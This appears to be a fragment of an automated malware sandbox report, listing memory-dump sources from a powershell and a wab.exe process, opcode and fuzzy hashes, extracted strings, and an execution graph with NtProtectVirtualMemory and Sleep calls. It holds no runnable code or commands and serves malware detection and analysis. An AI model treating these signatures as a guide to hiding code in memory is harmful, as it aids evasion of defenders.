                                                                                • Opcode ID: 58d4f2dd21baca15e66eb583cc400778e0315f55d81520b1d67e4db96ea3ee39
                                                                                • Instruction ID: 7e9c5953b1e28470fdf24364db0f097dbbf9ac265fc1c74cf7cb9d8c49b390df
                                                                                • Opcode Fuzzy Hash: 58d4f2dd21baca15e66eb583cc400778e0315f55d81520b1d67e4db96ea3ee39
                                                                                • Instruction Fuzzy Hash: 1671A2B4B01205DFC714CF68C852AAABBF2EF89718F159069D8019B755CB36EC81CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 844l$844l$tP]q$tP]q
                                                                                • API String ID: 0-4072182069
                                                                                • Opcode ID: a106856824b6cebeb333cb16717859b3c31672224046c34f6bc8a58d0e314121
                                                                                • Instruction ID: 1a1ceb691bd90b5a3370bf70ecc9cd37b266a940e67a0902b4e5113d985a1256
                                                                                • Opcode Fuzzy Hash: a106856824b6cebeb333cb16717859b3c31672224046c34f6bc8a58d0e314121
                                                                                • Instruction Fuzzy Hash: 5D5149B1705355AFC7249B68C851B6ABFE6AF85728F14C45AE984CF391C636CC80C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                • API String ID: 0-858218434
                                                                                • Opcode ID: 4d4f3e61bdaba295940818b782fb7d7717517fd674090692043bf5df01ecd5a9
                                                                                • Instruction ID: 08644c1f0a53fb9fc787ae1b68715dafcee066978ad5c5fdddbc36b1fea67dc1
                                                                                • Opcode Fuzzy Hash: 4d4f3e61bdaba295940818b782fb7d7717517fd674090692043bf5df01ecd5a9
                                                                                • Instruction Fuzzy Hash: 673138B17102165BEB285A395C9273AB69AAFC4B14F10883A9E41CF285DD7ACD8083B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                • API String ID: 0-858218434
                                                                                • Opcode ID: 6d91776a18f08e706641080ca2856e5a9880f2d3d1f36cc4fb4d192c420b55fe
                                                                                • Instruction ID: 2f2a97dab045d72d7e09778237c4d52a6e050e0fdadc15fc1bea473bdeb0ac6f
                                                                                • Opcode Fuzzy Hash: 6d91776a18f08e706641080ca2856e5a9880f2d3d1f36cc4fb4d192c420b55fe
                                                                                • Instruction Fuzzy Hash: A921ABB231130A5BDB38593E9842B77BBDAABC1718F20842AED09CB381CD75D8C1C761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                • API String ID: 0-978391646
                                                                                • Opcode ID: 686e05cbeb8deeb0b0393063747d7ff2bf6871bbaba1f4e6da86bcdee4d63492
                                                                                • Instruction ID: 33c111b00f36396d7719459eb4fe9c5ac99b62cfd73fbb5bdca83da57be6da7b
                                                                                • Opcode Fuzzy Hash: 686e05cbeb8deeb0b0393063747d7ff2bf6871bbaba1f4e6da86bcdee4d63492
                                                                                • Instruction Fuzzy Hash: 6A01FC7070A38E4FC72A563C28302916FB26F8395431A08ABD591DF3A7CA284C498766
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:27.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:100%
                                                                                Total number of Nodes:4
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 19 45c0256 20 45bf63c 19->20 20->19 21 45c0311 NtProtectVirtualMemory 20->21 22 45c0303 Sleep 20->22 21->20 22->19

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_045C0256 1 Function_045BFA80 0->1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00000005), ref: 045C0305
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.3334087084.0000000003FA1000.00000040.00000400.00020000.00000000.sdmp, Offset: 03FA1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_3fa1000_wab.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: GCgd
                                                                                • API String ID: 3472027048-892916768
                                                                                • Opcode ID: 290deb220704a85b2098d929b92d2c29693593fced85227084ed1eed4ad9b4a8
                                                                                • Instruction ID: c15ea87deaea102e8914070aec109398128766fde5f7ed01860cb9f22344a042
                                                                                • Opcode Fuzzy Hash: 290deb220704a85b2098d929b92d2c29693593fced85227084ed1eed4ad9b4a8
                                                                                • Instruction Fuzzy Hash: 7141BAB26413C1DFD3015EB4CC8C7E93B60BF16B66F288688D5918B1E3D7618886CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%